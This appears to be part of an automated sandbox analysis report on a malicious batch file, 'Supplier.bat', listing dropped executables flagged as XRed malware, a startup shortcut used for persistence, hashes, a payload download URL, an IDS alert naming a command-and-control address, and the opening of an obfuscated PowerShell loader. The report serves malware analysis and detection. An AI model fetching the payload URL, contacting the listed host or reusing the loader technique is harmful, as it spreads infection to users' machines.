.F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 09:36:38 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9949219848475535
Encrypted:	false
SSDEEP:	48:8I4bdCT4FHhidAKZdA1mehBiZUk1W1qehRkJy+C:8I1cz9xYy
MD5:	7E8CE94ECFFD7607170DF3B59AD0B14A
SHA1:	2C6017B1E65E7745D6F20F7D337E656FFEB1D4AE
SHA-256:	51DD85485F058951A5C5F20A5F8C6F66454335B00F2751A18722C7AAE657C051
SHA-512:	8D0E51273209B5407B2795982974AB1308E946FB5C9AD9709020A5A62D59481691E110C9CD9003753A1409A6A1A460CAAFB15DBA838B1CD03E3540BC1C03D28B
Malicious:	false
Preview:	L..................F.@.. ...$+.,....&..Z......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.Y.T....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.T....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.Y.T....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.Y.T...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.T....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............\|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 09:36:38 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.004395422594573
Encrypted:	false
SSDEEP:	48:8X4bdCT4FHhidAKZdA1duT1ehOuTbbiZUk5OjqehOuTbjkJy+yT+:8X1cyTyTbxWOvTbjYy7T
MD5:	049F296590F6CEE5F9B5D5C6E1BCCBA4
SHA1:	790C43B43AF083629B2865619FFDCF800F44E783
SHA-256:	306584FFE7E2C3251DBB3C28263F56A5D7F66CD0E5ADEF8842E7ABA6463ECE38
SHA-512:	A5B579BFBF0FC7BD6BC7AC09E160C151B3AD30E4C1B4EA03828F9E8D45734624643DADF6A7E810E62621EDDD5B37C9EA48FD99DC048A51F5F3F72C2194F267CA
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......Z......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.Y.T....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.T....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.Y.T....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.Y.T...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.T....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............\|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk

Download File

Process:	C:\Users\user\Desktop\._cache_DOCX.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:37:09 2024, mtime=Mon Dec 30 09:37:09 2024, atime=Mon Dec 30 09:37:09 2024, length=939008, window=hide
Category:	dropped
Size (bytes):	1802
Entropy (8bit):	3.4291118700685312
Encrypted:	false
SSDEEP:	24:8h0/83P7ShKeV7iLA4M8E2+s9T4IlPkhxm:8W/83PtOi85ur9MIlPkX
MD5:	63FB74511C7414EAAED1257E0F0FB862
SHA1:	C1CE5F9E8684907003A6FA64FF331E9FB08F5663
SHA-256:	1A98E39640D81F7FD3B153654E5C8FDC9B41569687026DC42F1750D093832658
SHA-512:	BC7BB83A27543DA8572410552F516694FADA798DE20DE89DA59B4680A72C1417503FA61BDE635558F2BA29E7177412B9DCE21FF80A0FADC1DAC66CB00E0012F1
Malicious:	false
Preview:	L..................F.@.. ...j.x.Z..&.}.Z..&.}.Z...T........................:..DG..Yr?.D..U..k0.&...&.........5q.......Z....L.Z......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.T...........................c..A.p.p.D.a.t.a...B.V.1......Y.T..Roaming.@......EW)N.Y.T...........................p'.R.o.a.m.i.n.g.....V.1......Y.T..Windata.@......Y.T.Y.T....F......................=..W.i.n.d.a.t.a.....`.2..T...Y.T .XVZBZS.exe..F......Y.T.Y.T....W......................@D.X.V.Z.B.Z.S...e.x.e......._...............-.......^..............\|.....C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.X.V.Z.B.Z.S...e.x.e.(.".C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..................................................................................................................

C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe

Download File

Process:	C:\Users\user\Desktop\._cache_DOCX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	939008
Entropy (8bit):	7.966472221511527
Encrypted:	false
SSDEEP:	24576:shloDX0XOf4lSk1iCyNjgNFA80yHI9K9Y:shloJfjQiCSAKyHI9K9
MD5:	14AE5A17618D08F48A350E9496C2C959
SHA1:	678BEA5C7D0BB18D0DCAB46C646536DE5A51D24F
SHA-256:	36DAC4B76A8C3EA977D141EE3DF142383EFA9B0BC24D19DA949D106D0B602207
SHA-512:	FCA819082BD9479A7D8BCF27203F4A832E6148DC44655463A28490CA3C3F39F5D1D5AE57F6C235A03FCA136B6E315338E776040D1AD18EB200D3953E73D464C2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: docx.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...HKQg.........."......P.......0.......@........@.......................................@...@.......@.....................t...$.......t...............................................................H...........................................UPX0.....0..............................UPX1.....P...@...D..................@....rsrc................H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Desktop\._cache_DOCX.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	939008
Entropy (8bit):	7.966472221511527
Encrypted:	false
SSDEEP:	24576:shloDX0XOf4lSk1iCyNjgNFA80yHI9K9Y:shloJfjQiCSAKyHI9K9
MD5:	14AE5A17618D08F48A350E9496C2C959
SHA1:	678BEA5C7D0BB18D0DCAB46C646536DE5A51D24F
SHA-256:	36DAC4B76A8C3EA977D141EE3DF142383EFA9B0BC24D19DA949D106D0B602207
SHA-512:	FCA819082BD9479A7D8BCF27203F4A832E6148DC44655463A28490CA3C3F39F5D1D5AE57F6C235A03FCA136B6E315338E776040D1AD18EB200D3953E73D464C2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...HKQg.........."......P.......0.......@........@.......................................@...@.......@.....................t...$.......t...............................................................H...........................................UPX0.....0..............................UPX1.....P...@...D..................@....rsrc................H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Documents\BNAGMGSPLO.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\~$BNAGMGSPLO.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.3520167401771568
Encrypted:	false
SSDEEP:	3:xvXFz7f:9Xl
MD5:	4B86B2D21B2AC48AD3A1A46FBF1DE4D5
SHA1:	2D695349311A0DAF9B77392C04178F1BD99CCEF2
SHA-256:	22C126EA43AB2F7C80E19E857C50118A3E08A4A98BE31E2ADCFCA88C8E6C5A5D
SHA-512:	FE133E064DAF100FAD21CB4AE44AE573F66A0157A9418538FCE9744B8FB0500478EDE10B9A49E222AA21F14DCB32B384BA1B4D06402D6519EC4E645295F46B76
Malicious:	false
Preview:	.user ..b.r.o.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.638498239119241
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9h
MD5:	4BC81D74086B89C85F1D208F781675F3
SHA1:	C5245605E8CA888E36810A817DC977696207B90B
SHA-256:	F85A3EAA91C625FDA14FE0C55BED7C3F43321475D871AA07AF90A2E532219B85
SHA-512:	3FD588E5A49CCA2C63784AE363FF5FAE6574D83F08D877F1089768E000F0A7DAFD51B7B28C2A543426073F2D9A96FC1E1E25796C713A5141E97C7E283901A750
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Users\user\Downloads\1a6946d3-ebff-4ef2-9ef3-e64281789500.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	7.988769841509695
Encrypted:	false
SSDEEP:	384:E419rW/tsORstipc2U0f1ZH4uRghUnFVcfu:E419rM/2tipc2nT4UgW
MD5:	719B5A3E9026D22FC525CB34AD1F0730
SHA1:	88A889318E1A735E4C842020A3D1218E8875C17A
SHA-256:	9731D303A8E5F6C2724F8DDDEAE3D2765A7C633267D7EDBEA918980274AC989F
SHA-512:	364B804E734FA6D07897D5F50CF9885C5A84E4367DD19F3DB1F22F6650219C41E188131990D6074B5B7E6E362E582427342C5D6C472127F6A7C3534B3B4F8362
Malicious:	false
Preview:	PK..-......9.Y...............DOCX.exe....................p.6pL......3c...C....+..5[D.dwkq....8../.T..du....RE.~..3.kQ.x.f..%%..4.<..]....DN...g.#c ..[.f..+.m.eyo@.E.z........IT6....r.A..P}}I6,O..a..SS.2%..s(GxV...s.v..'+.M..q.y....Z:....._P.......9...y8..A.d.:r...c.N.S\..@&i..L.M...J....b......8M....8..s\|...%..i'#7.+,.t.+...... ..n\.Vi....w8.......3./.~....Z.7...f>.."'.?..x.@.PIj5.Xm....fB.\~.E...6G.w.c%....w.....O._L=......\|X...............d.....E.U...9.........k..>......AK..U.5.eA.?.o.Y.~.l...3&. .m..h.)..#.....YU^4FFrD..7...X%..\|. ..L1.J&0\...o..T.yq37.j%....K.\?...%/:Qr.._'kqDf..._....ty.CL.=../.)..C:.?..U..J..a...b[>......1\|............:...~..Z. .....F...v(...F"7....]J.f.l,.daD7.1.n..B...aR\|.d..#......{].S......._.o.2_.d..0..,..T^...W2..-..z\.G......NK6...m.\...._.....xQ...I.0.....{<..J......S.{.C..X..)..R..&.v.>JK.Gt(..G..w.rrY...P5.......4/7.p....o.gE.....C..G....F.a..."wsV.}..H....>...SwX.Q....L.F.Z,Y-V.~..........6..fv.-...&

C:\Users\user\Downloads\DOCX.exe

Download File

Process:	C:\Program Files\7-Zip\7z.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1710592
Entropy (8bit):	7.558156580962077
Encrypted:	false
SSDEEP:	49152:onsHyjtk2MYC5GDFhloJfjQiCSAKyHI9K90:onsmtk2aAhl0RC1gj
MD5:	A0177C0A9F2254179B112EECF3C58CC6
SHA1:	03478F572F818C8FFD7F8EBE23632432E82E4461
SHA-256:	55D2BEA108EEAABCDF59D449CF15F0EFABB59E243D9BD91FF0B0805CD3D133DF
SHA-512:	0247F803D5018659899766FE8758C14081B1FE9F414C2AFB8F34E78569BF5E9063B746C3ADF388B60017367070582E7D8B9422AE94BCEF4C8C0D39FA7E4A4470
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Downloads\DOCX.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Downloads\DOCX.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................z....................@..............................................@..............................B......0q...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0q.......r..................@..P....................................@..P........................................................................................................................................

C:\Users\user\Downloads\DOCX.zip (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1304402
Entropy (8bit):	7.9998401380992945
Encrypted:	true
SSDEEP:	24576:soTGvXybnyeOYkaViDp5HMxkUNPczzldtL0T2jPyqYI1NDJD:soTGvXyzi5VWx2zzldtLfPYYnD
MD5:	F5AB8279F54707922E6AE1F83B93478A
SHA1:	528CF2AC4DF0AEB4ECAC7E989B06F7461D24EA3C
SHA-256:	D7C01F4991ABC009F182B7DD457DA87DECA1C3A4DB05B25D4F1B058FCC8A8339
SHA-512:	9A0832E381F9407049F33A0EF86E96B924253DD6F7E42C20514A49528BC7BD024767DD4B06C10EDF98FE5AE90BD48109FBCA1A820DD8428EA22A3F68E9D9DAB1
Malicious:	true
Preview:	PK..-......9.Y...............DOCX.exe....................p.6pL......3c...C....+..5[D.dwkq....8../.T..du....RE.~..3.kQ.x.f..%%..4.<..]....DN...g.#c ..[.f..+.m.eyo@.E.z........IT6....r.A..P}}I6,O..a..SS.2%..s(GxV...s.v..'+.M..q.y....Z:....._P.......9...y8..A.d.:r...c.N.S\..@&i..L.M...J....b......8M....8..s\|...%..i'#7.+,.t.+...... ..n\.Vi....w8.......3./.~....Z.7...f>.."'.?..x.@.PIj5.Xm....fB.\~.E...6G.w.c%....w.....O._L=......\|X...............d.....E.U...9.........k..>......AK..U.5.eA.?.o.Y.~.l...3&. .m..h.)..#.....YU^4FFrD..7...X%..\|. ..L1.J&0\...o..T.yq37.j%....K.\?...%/:Qr.._'kqDf..._....ty.CL.=../.)..C:.?..U..J..a...b[>......1\|............:...~..Z. .....F...v(...F"7....]J.f.l,.daD7.1.n..B...aR\|.d..#......{].S......._.o.2_.d..0..,..T^...W2..-..z\.G......NK6...m.\...._.....xQ...I.0.....{<..J......S.{.C..X..)..R..&.v.>JK.Gt(..G..w.rrY...P5.......4/7.p....o.gE.....C..G....F.a..."wsV.}..H....>...SwX.Q....L.F.Z,Y-V.~..........6..fv.-...&

C:\Users\user\Downloads\DOCX.zip.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1304402
Entropy (8bit):	7.9998401380992945
Encrypted:	true
SSDEEP:	24576:soTGvXybnyeOYkaViDp5HMxkUNPczzldtL0T2jPyqYI1NDJD:soTGvXyzi5VWx2zzldtLfPYYnD
MD5:	F5AB8279F54707922E6AE1F83B93478A
SHA1:	528CF2AC4DF0AEB4ECAC7E989B06F7461D24EA3C
SHA-256:	D7C01F4991ABC009F182B7DD457DA87DECA1C3A4DB05B25D4F1B058FCC8A8339
SHA-512:	9A0832E381F9407049F33A0EF86E96B924253DD6F7E42C20514A49528BC7BD024767DD4B06C10EDF98FE5AE90BD48109FBCA1A820DD8428EA22A3F68E9D9DAB1
Malicious:	false
Preview:	PK..-......9.Y...............DOCX.exe....................p.6pL......3c...C....+..5[D.dwkq....8../.T..du....RE.~..3.kQ.x.f..%%..4.<..]....DN...g.#c ..[.f..+.m.eyo@.E.z........IT6....r.A..P}}I6,O..a..SS.2%..s(GxV...s.v..'+.M..q.y....Z:....._P.......9...y8..A.d.:r...c.N.S\..@&i..L.M...J....b......8M....8..s\|...%..i'#7.+,.t.+...... ..n\.Vi....w8.......3./.~....Z.7...f>.."'.?..x.@.PIj5.Xm....fB.\~.E...6G.w.c%....w.....O._L=......\|X...............d.....E.U...9.........k..>......AK..U.5.eA.?.o.Y.~.l...3&. .m..h.)..#.....YU^4FFrD..7...X%..\|. ..L1.J&0\...o..T.yq37.j%....K.\?...%/:Qr.._'kqDf..._....ty.CL.=../.)..C:.?..U..J..a...b[>......1\|............:...~..Z. .....F...v(...F"7....]J.f.l,.daD7.1.n..B...aR\|.d..#......{].S......._.o.2_.d..0..,..T^...W2..-..z\.G......NK6...m.\...._.....xQ...I.0.....{<..J......S.{.C..X..)..R..&.v.>JK.Gt(..G..w.rrY...P5.......4/7.p....o.gE.....C..G....F.a..."wsV.}..H....>...SwX.Q....L.F.Z,Y-V.~..........6..fv.-...&

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.295984628265333
Encrypted:	false
SSDEEP:	6144:J41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+6dmBMZJh1VjH:e1/YCW2AoQ0NisdwMHrVD
MD5:	7B623FF0ECD62D0EFA419E9CF166123F
SHA1:	5180C29C69F0A5846BF4B44E80661F2FEE873E7F
SHA-256:	CA256E3E1572C72CA4EBEEDB4DDC64FD3BEDFB7856EE75A27CFFE49AFB8859B0
SHA-512:	480E8672AF01349BA833BA8A14EFD18323548CED4644C9C02438AF3F94ACB8DE5EC82CAF3C34B9A195D4D975039E402F978847A02272A5D6D545A9F6131D9B7F
Malicious:	false
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..a.Z................................................................................................................................................................................................................................................................................................................................................u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 1013

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	downloaded
Size (bytes):	1304402
Entropy (8bit):	7.9998401380992945
Encrypted:	true
SSDEEP:	24576:soTGvXybnyeOYkaViDp5HMxkUNPczzldtL0T2jPyqYI1NDJD:soTGvXyzi5VWx2zzldtLfPYYnD
MD5:	F5AB8279F54707922E6AE1F83B93478A
SHA1:	528CF2AC4DF0AEB4ECAC7E989B06F7461D24EA3C
SHA-256:	D7C01F4991ABC009F182B7DD457DA87DECA1C3A4DB05B25D4F1B058FCC8A8339
SHA-512:	9A0832E381F9407049F33A0EF86E96B924253DD6F7E42C20514A49528BC7BD024767DD4B06C10EDF98FE5AE90BD48109FBCA1A820DD8428EA22A3F68E9D9DAB1
Malicious:	false
URL:	https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip
Preview:	PK..-......9.Y...............DOCX.exe....................p.6pL......3c...C....+..5[D.dwkq....8../.T..du....RE.~..3.kQ.x.f..%%..4.<..]....DN...g.#c ..[.f..+.m.eyo@.E.z........IT6....r.A..P}}I6,O..a..SS.2%..s(GxV...s.v..'+.M..q.y....Z:....._P.......9...y8..A.d.:r...c.N.S\..@&i..L.M...J....b......8M....8..s\|...%..i'#7.+,.t.+...... ..n\.Vi....w8.......3./.~....Z.7...f>.."'.?..x.@.PIj5.Xm....fB.\~.E...6G.w.c%....w.....O._L=......\|X...............d.....E.U...9.........k..>......AK..U.5.eA.?.o.Y.~.l...3&. .m..h.)..#.....YU^4FFrD..7...X%..\|. ..L1.J&0\...o..T.yq37.j%....K.\?...%/:Qr.._'kqDf..._....ty.CL.=../.)..C:.?..U..J..a...b[>......1\|............:...~..Z. .....F...v(...F"7....]J.f.l,.daD7.1.n..B...aR\|.d..#......{].S......._.o.2_.d..0..,..T^...W2..-..z\.G......NK6...m.\...._.....xQ...I.0.....{<..J......S.{.C..X..)..R..&.v.>JK.Gt(..G..w.rrY...P5.......4/7.p....o.gE.....C..G....F.a..."wsV.}..H....>...SwX.Q....L.F.Z,Y-V.~..........6..fv.-...&

\Device\ConDrv

Download File

Process:	C:\Program Files\7-Zip\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	424
Entropy (8bit):	5.059254317685186
Encrypted:	false
SSDEEP:	6:AMnM3vtFHcAxXF2Saiev9fl1uzQiST3v9f4ZQF1Aiev9f4ZWtHgNX/Ffpap1tNEy:poVZRwUzeTwQFyoWYJA1tNZ
MD5:	BB7B506280F9589DA5F31527F416B003
SHA1:	03BB492B9884F7AA22D00EB0343D181FFDAD3CF5
SHA-256:	3AA48A147E1193E3A9CA2F733BA105F7B2D46D8F6EC630F9F997E3934D3B560F
SHA-512:	772734CBE2F3BEB4B3B785FA164EB291A7593E603BC6D5646DE53E037B55DDEDCB625CE8817EFA3A651BDB1BE159FA9D8B483ABA2DE03CDCCEECD0A9750E64AF
Malicious:	false
Preview:	..7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan C:\Users\user\Downloads\. .1 file, 1304402 bytes (1274 KiB)....Extracting archive: C:\Users\user\Downloads\DOCX.zip..--..Path = C:\Users\user\Downloads\DOCX.zip..Type = zip..Physical Size = 1304402.... 0%. .Everything is Ok....Size: 1710592..Compressed: 1304402..

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	115
Entropy (8bit):	4.07869002372547
Encrypted:	false
SSDEEP:	3:hYFEAR+mQRKVxLZtURtmqg2Htyst3g4t32vov:hYFKaNZmR8q3tyMXt3X
MD5:	DB05A7EBA1075A83BC6CEC863FA091C5
SHA1:	C20C4490F89B9E07E47E01FDCF7D08ACDA2AF223
SHA-256:	0E012D3E3643DBCAB840EF24E2C9D170A8433188FD925EAB5009102DDA904EE5
SHA-512:	63EA25CFE1D8BDF0F639725094302E79BC61988F7094E24959F907B657208AF69226158891BBB65EBD1A49A01EE36C2EC407D3D2CF2A5517344ECFA728B5D987
Malicious:	false
Preview:	..Waiting for 15 seconds, press a key to continue .....14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General

File type:	Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
Entropy (8bit):	4.483149790225941
TrID:	Affix file (4004/1) 100.00%
File name:	Supplier.bat
File size:	42'387 bytes
MD5:	b84568e632497dd5dc2f4ac9f08b783c
SHA1:	a0a8e9493a356a2c495130da52c5b49c3d82685a
SHA256:	b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
SHA512:	e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
SSDEEP:	96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0
TLSH:	B613FF9017DEBB3D7049EBB164276A3B90575ADDBCB7904770A090EDDFB8A08D229213
File Content Preview:	SET ..............................=CPZSYiyzvRNBxawWkVFUcqonrpeHAfmMJQtIlXgGTOhDjsuEKbLd..<# :batch script..@echo off..if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit..PowerShell -ExecutionPolicy Bypass -NoProfile -Wind

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T11:36:22.777444+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50042	172.111.138.100	5552	TCP
